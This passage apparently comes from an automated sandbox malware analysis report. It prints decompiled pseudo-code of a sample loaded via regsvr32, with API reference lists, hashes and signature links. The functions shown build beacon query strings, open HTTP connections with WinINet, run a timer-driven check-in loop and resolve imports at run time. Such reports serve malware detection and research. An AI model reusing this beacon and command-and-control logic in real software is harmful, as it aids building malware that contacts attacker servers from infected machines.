					_t105 = _t49;
					if(_t105 != 0) {
						_t88 =  *0x2afa348; // 0x248d5a8
						_t12 = _t88 + 0x2afb8c2; // 0x736e6426
						_t91 = wsprintfA(_t115 + _t98, _t12, _t105);
						_t123 = _t123 + 0xc;
						_t115 = _t115 + _t91;
						HeapFree( *0x2afa2d8, 0, _t105);
					}
					_t106 = E02AF3ACA();
					if(_t106 != 0) {
						_t83 =  *0x2afa348; // 0x248d5a8
						_t14 = _t83 + 0x2afb8ca; // 0x6f687726
						_t86 = wsprintfA(_t115 + _t98, _t14, _t106);
						_t123 = _t123 + 0xc;
						_t115 = _t115 + _t86;
						HeapFree( *0x2afa2d8, 0, _t106);
					}
					_t107 =  *0x2afa3cc; // 0x4f89600
					_a20 = E02AF4B69(0x2afa00a, _t107 + 4);
					_t53 =  *0x2afa36c; // 0x4f895b0
					_t109 = 0;
					if(_t53 != 0) {
						_t80 =  *0x2afa348; // 0x248d5a8
						_t17 = _t80 + 0x2afb889; // 0x3d736f26
						wsprintfA(_t115 + _t98, _t17, _t53);
					}
					if(_a20 != _t109) {
						_t116 = RtlAllocateHeap( *0x2afa2d8, _t109, 0x800);
						if(_t116 != _t109) {
							E02AF53AE(GetTickCount());
							_t59 =  *0x2afa3cc; // 0x4f89600
							__imp__(_t59 + 0x40);
							asm("lock xadd [eax], ecx");
							_t63 =  *0x2afa3cc; // 0x4f89600
							__imp__(_t63 + 0x40);
							_t65 =  *0x2afa3cc; // 0x4f89600
							_t66 = E02AF2281(1, _t103, _t98,  *_t65); // executed
							_t119 = _t66;
							asm("lock xadd [eax], ecx");
							if(_t119 != _t109) {
								StrTrimA(_t119, 0x2af9280);
								_push(_t119);
								_t71 = E02AF6311();
								_v20 = _t71;
								if(_t71 != _t109) {
									_t110 = __imp__;
									 *_t110(_t119, _v8);
									 *_t110(_t116, _v8);
									_t111 = __imp__;
									 *_t111(_t116, _v32);
									 *_t111(_t116, _t119);
									_t77 = E02AF5D05(0xffffffffffffffff, _t116, _v28, _v24); // executed
									_v56 = _t77;
									if(_t77 != 0 && _t77 != 0x10d2) {
										E02AF14C6();
									}
									HeapFree( *0x2afa2d8, 0, _v48);
									_t109 = 0;
								}
								HeapFree( *0x2afa2d8, _t109, _t119);
							}
							RtlFreeHeap( *0x2afa2d8, _t109, _t116); // executed
						}
						HeapFree( *0x2afa2d8, _t109, _a12);
					}
					RtlFreeHeap( *0x2afa2d8, _t109, _t98); // executed
				}
				return _v16;
			}

0x02af3643
0x02af3643
0x02af3643
0x02af3658
0x02af365a
0x02af365f
0x02af3663
0x02af366b
0x02af3671
0x02af3675
0x02af367d
0x02af3685
0x02af3685
0x02af3687
0x02af3693
0x02af36a2
0x02af36a7
0x02af36aa
0x02af36af
0x02af36b2
0x02af36b7
0x02af36ba
0x02af36c6
0x02af36d3
0x02af36d5
0x02af36db
0x02af36e0
0x02af36eb
0x02af36ed
0x02af36f0
0x02af36f6
0x02af36f8
0x02af3701
0x02af370c
0x02af370e
0x02af3711
0x02af3711
0x02af3713
0x02af3718
0x02af3724
0x02af3726
0x02af3729
0x02af372b
0x02af3730
0x02af3734
0x02af3736
0x02af373b
0x02af3747
0x02af3749
0x02af3755
0x02af3757
0x02af3757
0x02af3762
0x02af3766
0x02af3768
0x02af376d
0x02af3779
0x02af377b
0x02af3787
0x02af3789
0x02af3789
0x02af378f
0x02af37a2
0x02af37a6
0x02af37ab
0x02af37af
0x02af37b2
0x02af37b7
0x02af37c1
0x02af37c3
0x02af37ca
0x02af37e2
0x02af37e6
0x02af37f2
0x02af37f7
0x02af3800
0x02af3811
0x02af3815
0x02af381e
0x02af3824
0x02af382c
0x02af3831
0x02af383e
0x02af3844
0x02af3850
0x02af3856
0x02af3857
0x02af385c
0x02af3862
0x02af3868
0x02af386f
0x02af3876
0x02af387c
0x02af3883
0x02af3887
0x02af3892
0x02af3897
0x02af389d
0x02af38a6
0x02af38a6
0x02af38b7
0x02af38bd
0x02af38bd
0x02af38c7
0x02af38c7
0x02af38d5
0x02af38d5
0x02af38e6
0x02af38e6
0x02af38f4
0x02af38f4
0x02af3905

APIs

RtlAllocateHeap.NTDLL ref: 02AF366B
GetTickCount.KERNEL32 ref: 02AF367F
wsprintfA.USER32 ref: 02AF36CE
wsprintfA.USER32 ref: 02AF36EB
wsprintfA.USER32 ref: 02AF370C
wsprintfA.USER32 ref: 02AF3724
wsprintfA.USER32 ref: 02AF3747
HeapFree.KERNEL32(00000000,00000000), ref: 02AF3757
wsprintfA.USER32 ref: 02AF3779
HeapFree.KERNEL32(00000000,00000000), ref: 02AF3789
wsprintfA.USER32 ref: 02AF37C1
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02AF37DC
GetTickCount.KERNEL32 ref: 02AF37EC
RtlEnterCriticalSection.NTDLL(04F895C0), ref: 02AF3800
RtlLeaveCriticalSection.NTDLL(04F895C0), ref: 02AF381E

Part of subcall function 02AF2281: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,775EC740,02AF3831,00000000,04F89600), ref: 02AF22AC
Part of subcall function 02AF2281: lstrlen.KERNEL32(00000000,?,775EC740,02AF3831,00000000,04F89600), ref: 02AF22B4
Part of subcall function 02AF2281: strcpy.NTDLL ref: 02AF22CB
Part of subcall function 02AF2281: lstrcat.KERNEL32(00000000,00000000), ref: 02AF22D6
Part of subcall function 02AF2281: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,02AF3831,?,775EC740,02AF3831,00000000,04F89600), ref: 02AF22F3

StrTrimA.SHLWAPI(00000000,02AF9280,00000000,04F89600), ref: 02AF3850

Part of subcall function 02AF6311: lstrlen.KERNEL32(04F89BB8,00000000,00000000,00000000,02AF385C,00000000), ref: 02AF6321
Part of subcall function 02AF6311: lstrlen.KERNEL32(?), ref: 02AF6329
Part of subcall function 02AF6311: lstrcpy.KERNEL32(00000000,04F89BB8), ref: 02AF633D
Part of subcall function 02AF6311: lstrcat.KERNEL32(00000000,?), ref: 02AF6348

lstrcpy.KERNEL32(00000000,?), ref: 02AF386F
lstrcpy.KERNEL32(00000000,?), ref: 02AF3876
lstrcat.KERNEL32(00000000,?), ref: 02AF3883
lstrcat.KERNEL32(00000000,00000000), ref: 02AF3887

Part of subcall function 02AF5D05: WaitForSingleObject.KERNEL32(00000000,747581D0,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02AF5DB7

HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 02AF38B7
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02AF38C7
RtlFreeHeap.NTDLL(00000000,00000000,00000000,04F89600), ref: 02AF38D5
HeapFree.KERNEL32(00000000,?), ref: 02AF38E6
RtlFreeHeap.NTDLL(00000000,00000000), ref: 02AF38F4

Strings

Uqt, xrefs: 02AF3757, 02AF3789, 02AF38B7, 02AF38C7, 02AF38D5, 02AF38E6, 02AF38F4

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: Heap$Freewsprintf$lstrcatlstrlen$lstrcpy$AllocateCountCriticalSectionTickTrim$EnterLeaveObjectSingleWaitstrcpy
String ID: Uqt
API String ID: 186568778-2320327147
Opcode ID: 543c48e99bcafee373c9c47b3d618b459513503fdf65715a784db6fec06d4e13
Instruction ID: 9ecfebc1b1553f9cc3bb2a1461d6210b636be97b3dc85b8089a6cf0c4cbdda78
Opcode Fuzzy Hash: 543c48e99bcafee373c9c47b3d618b459513503fdf65715a784db6fec06d4e13
Instruction Fuzzy Hash: BA71B371940201AFC7A1ABE4EC48E9777E8EB88700B150A54FB49C3211DF3DE966DB61

Uniqueness

Uniqueness Score: -1.00%

Function 02AF7B59 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 126
networkstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E02AF7B59(void* __eax, void* __ecx, long __esi, char* _a4) {
				void _v8;
				long _v12;
				void _v16;
				void* _t34;
				void* _t38;
				void* _t40;
				char* _t56;
				long _t57;
				void* _t58;
				intOrPtr _t59;
				long _t65;

				_t65 = __esi;
				_t58 = __ecx;
				_v16 = 0xea60;
				__imp__( *(__esi + 4));
				_v12 = __eax + __eax;
				_t56 = E02AF7A71(__eax + __eax + 1);
				if(_t56 != 0) {
					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
						E02AF789E(_t56);
					} else {
						E02AF789E( *(__esi + 4));
						 *(__esi + 4) = _t56;
					}
				}
				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
				 *(_t65 + 0x10) = _t34;
				if(_t34 == 0 || InternetSetStatusCallback(_t34, E02AF7AEE) == 0xffffffff) {
					L15:
					return GetLastError();
				} else {
					ResetEvent( *(_t65 + 0x1c));
					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x50, 0, 0, 3, 0, _t65); // executed
					 *(_t65 + 0x14) = _t38;
					if(_t38 != 0 || GetLastError() == 0x3e5 && E02AF2129( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
						_t59 =  *0x2afa348; // 0x248d5a8
						_t15 = _t59 + 0x2afb73b; // 0x544547
						_v8 = 0x84404000;
						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84404000, _t65); // executed
						 *(_t65 + 0x18) = _t40;
						if(_t40 == 0) {
							goto L15;
						}
						_t57 = 4;
						_v12 = _t57;
						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
							_v8 = _v8 | 0x00000100;
							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
						}
						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
							goto L15;
						} else {
							return 0;
						}
					} else {
						goto L15;
					}
				}
			}

0x02af7b59
0x02af7b59
0x02af7b64
0x02af7b6b
0x02af7b73
0x02af7b7d
0x02af7b83
0x02af7b96
0x02af7ba6
0x02af7b98
0x02af7b9b
0x02af7ba0
0x02af7ba0
0x02af7b96
0x02af7bb6
0x02af7bbc
0x02af7bc1
0x02af7caa
0x00000000
0x02af7bdc
0x02af7bdf
0x02af7bf2
0x02af7bf8
0x02af7bfd
0x02af7c25
0x02af7c38
0x02af7c42
0x02af7c45
0x02af7c4b
0x02af7c50
0x00000000
0x00000000
0x02af7c54
0x02af7c60
0x02af7c71
0x02af7c73
0x02af7c84
0x02af7c84
0x02af7c94
0x00000000
0x02af7ca6
0x00000000
0x02af7ca6
0x00000000
0x00000000
0x00000000
0x02af7bfd

APIs

lstrlen.KERNEL32(?,00000008,74714D40), ref: 02AF7B6B

Part of subcall function 02AF7A71: RtlAllocateHeap.NTDLL(00000000,00000000,02AF4DB1), ref: 02AF7A7D

InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 02AF7B8E
InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 02AF7BB6
InternetSetStatusCallback.WININET(00000000,02AF7AEE), ref: 02AF7BCD
ResetEvent.KERNEL32(?), ref: 02AF7BDF
InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 02AF7BF2
GetLastError.KERNEL32 ref: 02AF7BFF
HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 02AF7C45
InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 02AF7C63
InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 02AF7C84
InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 02AF7C90
InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 02AF7CA0
GetLastError.KERNEL32 ref: 02AF7CAA

Part of subcall function 02AF789E: RtlFreeHeap.NTDLL(00000000,00000000,02AF4E3E,00000000,?,00000000,00000000), ref: 02AF78AA

Strings

@MqtNqt, xrefs: 02AF7BFF, 02AF7CAA

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
String ID: @MqtNqt
API String ID: 2290446683-2883916605
Opcode ID: 20baffc6481a0f3a294ab3f0a0d6f746d0126a53f71734ac777d0dc5d95f6ab9
Instruction ID: 43f31bc11c0eb94838e47ff225f0f50fe87e78510a27158895f94aac19fcbf5f
Opcode Fuzzy Hash: 20baffc6481a0f3a294ab3f0a0d6f746d0126a53f71734ac777d0dc5d95f6ab9
Instruction Fuzzy Hash: 3541AF71940604BFE7719FE5DD88EABBBBDEB85B04F100918F702E2190EB38D516CA20

Uniqueness

Uniqueness Score: -1.00%

Function 02AF517A Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 151
timememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E02AF517A(void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void _v48;
				long _v52;
				struct %anon52 _v60;
				char _v72;
				long _v76;
				void* _v80;
				union _LARGE_INTEGER _v84;
				struct %anon52 _v92;
				void* _v96;
				void* _v100;
				union _LARGE_INTEGER _v104;
				long _v108;
				struct %anon52 _v124;
				long _v128;
				struct %anon52 _t46;
				void* _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				struct %anon52 _t66;
				void* _t69;
				void* _t73;
				signed int _t74;
				void* _t76;
				void* _t78;
				void** _t82;
				signed int _t86;
				void* _t89;

				_t76 = __edx;
				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v60 = _t46;
				if(_t46 == 0) {
					_v92.HighPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x2afa2e0);
					_v76 = 0;
					_v80 = 0;
					L02AF82AA();
					_v84.LowPart = _t46;
					_v80 = _t76;
					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
					_t51 =  *0x2afa30c; // 0x2bc
					_v76 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
					_v108 = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x2afa2ec = 5;
						} else {
							_t69 = E02AF61FE(_t76); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v104.LowPart = 0;
						L6:
						L6:
						if(_v104.LowPart == 1 && ( *0x2afa300 & 0x00000001) == 0) {
							_v104.LowPart = 2;
						}
						_t74 = _v104.LowPart;
						_t58 = _t74 << 4;
						_t78 = _t89 + (_t74 << 4) + 0x38;
						_t75 = _t74 + 1;
						_v92.LowPart = _t74 + 1;
						_t61 = E02AF64A2( &_v96, _t75, _t89 + _t58 + 0x38, _t78,  &_v100); // executed
						_v124 = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v92;
						_v104.LowPart = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_v124.HighPart = E02AF6821(_t75,  &_v72, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x2afa2e4);
							goto L21;
						} else {
							__eflags =  *0x2afa2e8; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E02AF14C6();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x2afa2e8);
								L21:
								L02AF82AA();
								_v104.LowPart = _t61;
								_v100 = _t78;
								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
								_v128 = _t65;
								__eflags = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t82 =  &_v72;
					_t73 = 3;
					do {
						_t54 =  *_t82;
						if(_t54 != 0) {
							HeapFree( *0x2afa2d8, 0, _t54);
						}
						_t82 =  &(_t82[4]);
						_t73 = _t73 - 1;
					} while (_t73 != 0);
					CloseHandle(_v80);
				}
				return _v92.HighPart;
				goto L25;
			}

0x02af517a
0x02af5190
0x02af5194
0x02af5199
0x02af51a0
0x02af51a6
0x02af51ac
0x02af5333
0x02af51b2
0x02af51b2
0x02af51b4
0x02af51b9
0x02af51ba
0x02af51c0
0x02af51c4
0x02af51c8
0x02af51d6
0x02af51e4
0x02af51e8
0x02af51ea
0x02af51f7
0x02af5203
0x02af5205
0x02af520b
0x02af5214
0x02af521f
0x02af521f
0x02af5216
0x02af5216
0x02af521d
0x00000000
0x00000000
0x02af521d
0x02af5229
0x00000000
0x02af522d
0x02af5232
0x02af523d
0x02af523d
0x02af5245
0x02af524b
0x02af5253
0x02af525c
0x02af5263
0x02af5267
0x02af526c
0x02af5272
0x00000000
0x00000000
0x02af5274
0x02af5278
0x02af527f
0x00000000
0x02af5281
0x02af5291
0x02af5291
0x00000000
0x02af52c2
0x02af52c2
0x02af52c7
0x02af52e6
0x02af52e8
0x02af52ed
0x02af52ee
0x00000000
0x02af52c9
0x02af52c9
0x02af52cf
0x00000000
0x02af52d1
0x02af52d1
0x02af52d6
0x02af52d8
0x02af52dd
0x02af52de
0x02af52f4
0x02af52f4
0x02af52fc
0x02af530a
0x02af530e
0x02af531a
0x02af531c
0x02af5320
0x02af5322
0x00000000
0x02af5328
0x00000000
0x02af5328
0x02af5322
0x02af52cf
0x00000000
0x02af52c7
0x02af5295
0x02af5297
0x02af529b
0x02af529c
0x02af529c
0x02af52a0
0x02af52aa
0x02af52aa
0x02af52b0
0x02af52b3
0x02af52b3
0x02af52ba
0x02af52ba
0x02af5341
0x00000000

APIs

memset.NTDLL ref: 02AF5194
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 02AF51A0
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 02AF51C8
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 02AF51E8
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,02AF1273,?), ref: 02AF5203
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,02AF1273,?,00000000), ref: 02AF52AA
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,02AF1273,?,00000000,?,?), ref: 02AF52BA
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 02AF52F4
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 02AF530E
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02AF531A

Part of subcall function 02AF61FE: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04F893D8,00000000,?,7476F710,00000000,7476F730), ref: 02AF624D
Part of subcall function 02AF61FE: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04F89410,?,00000000,30314549,00000014,004F0053,04F893CC), ref: 02AF62EA
Part of subcall function 02AF61FE: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,02AF521B), ref: 02AF62FC

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,02AF1273,?,00000000,?,?), ref: 02AF532D

Strings

Uqt, xrefs: 02AF52AA
@MqtNqt, xrefs: 02AF532D

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID: Uqt$@MqtNqt
API String ID: 3521023985-3266969629
Opcode ID: 92091d6f7b21ae025c4baac3140c6e66cb639c5641564fbf8a3dd6fb930ac95d
Instruction ID: a345c32ea3928065fc89d86f88c3f2b865ecaa0d12ef7453ab5e0e7374bc1927
Opcode Fuzzy Hash: 92091d6f7b21ae025c4baac3140c6e66cb639c5641564fbf8a3dd6fb930ac95d
Instruction Fuzzy Hash: 48519071908310AFC7909F95DC84E9BFBECEF89324F504A1AF6A882250CB78D551CF92

Uniqueness

Uniqueness Score: -1.00%

Function 02AF7F95 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 209
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			E02AF7F95(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x2af0000;
				_t115 = _t139[3] + 0x2af0000;
				_t131 = _t139[4] + 0x2af0000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x2af0000;
				_v16 = _t139[5] + 0x2af0000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x2af0002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x2afa1c0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x2afa1c0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x2afa1c0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x2afa1bc; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x2afa1c0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x2afa1b8; // 0x0
										 *_t102 = _t125;
										 *0x2afa1b8 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x2afa1bc; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}

0x02af7fa4
0x02af7fba
0x02af7fc0
0x02af7fc2
0x02af7fc7
0x02af7fcd
0x02af7fd2
0x02af7fd5
0x02af7fe3
0x02af7fea
0x02af7fed
0x02af7ff0
0x02af7ff1
0x02af7ff4
0x02af7ff7
0x02af7ffa
0x02af7fff
0x02af800e
0x00000000
0x02af8014
0x02af801e
0x02af8028
0x02af802d
0x02af802f
0x02af8039
0x02af803c
0x02af803f
0x02af8045
0x02af8047
0x02af8047
0x02af804a
0x02af804d
0x02af8052
0x02af8056
0x02af8069
0x02af806b
0x02af8113
0x02af8113
0x02af811a
0x02af811d
0x02af8127
0x02af8127
0x02af812b
0x02af81a9
0x02af81ac
0x02af81ae
0x02af81ae
0x02af81b5
0x02af81b7
0x02af81c1
0x02af81c4
0x02af81c7
0x02af81c7
0x00000000
0x02af812d
0x02af8130
0x02af815e
0x02af8168
0x02af816c
0x02af8174
0x02af8177
0x02af817e
0x02af8188
0x02af8188
0x02af818c
0x02af8191
0x02af81a0
0x02af81a6
0x02af81a6
0x02af818c
0x00000000
0x02af8137
0x02af813a
0x02af8142
0x02af8157
0x02af815c
0x00000000
0x00000000
0x02af815c
0x00000000
0x02af8142
0x02af8130
0x02af812b
0x02af8071
0x02af8078
0x02af8088
0x02af808b
0x02af8091
0x02af8095
0x02af80d8
0x02af80e4
0x02af810d
0x02af80e6
0x02af80ea
0x02af80f0
0x02af80f8
0x02af80fa
0x02af80fd
0x02af8103
0x02af8105
0x02af8105
0x02af80f8
0x02af80ea
0x00000000
0x02af80e4
0x02af809d
0x02af80a0
0x02af80a7
0x02af80b7
0x02af80ba
0x02af80ca
0x00000000
0x02af80d0
0x02af80b1
0x02af80b5
0x00000000
0x00000000
0x00000000
0x02af80b5
0x02af8082
0x02af8086
0x00000000
0x00000000
0x00000000
0x02af8086
0x02af805f
0x02af8063
0x00000000
0x00000000
0x00000000

APIs

RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 02AF800E
LoadLibraryA.KERNEL32(?), ref: 02AF808B
GetLastError.KERNEL32 ref: 02AF8097
RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 02AF80CA

Strings

$, xrefs: 02AF7FE3
@MqtNqt, xrefs: 02AF8097, 02AF816E

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad
String ID: $$@MqtNqt
API String ID: 948315288-516465142
Opcode ID: b5af137b93be4ed71eab11c034627af2e1f5adb081d2c6571adcf5c16df474a1
Instruction ID: 90523a984a7fd5f1f4d3942d01cd50c2ffd0b07631786960ff6176099f5180e0
Opcode Fuzzy Hash: b5af137b93be4ed71eab11c034627af2e1f5adb081d2c6571adcf5c16df474a1
Instruction Fuzzy Hash: FC811871A40605AFDBA0CFD8D884BAEB7F5BF48310F148529F609E7640EB78E949CB54

Uniqueness

Uniqueness Score: -1.00%

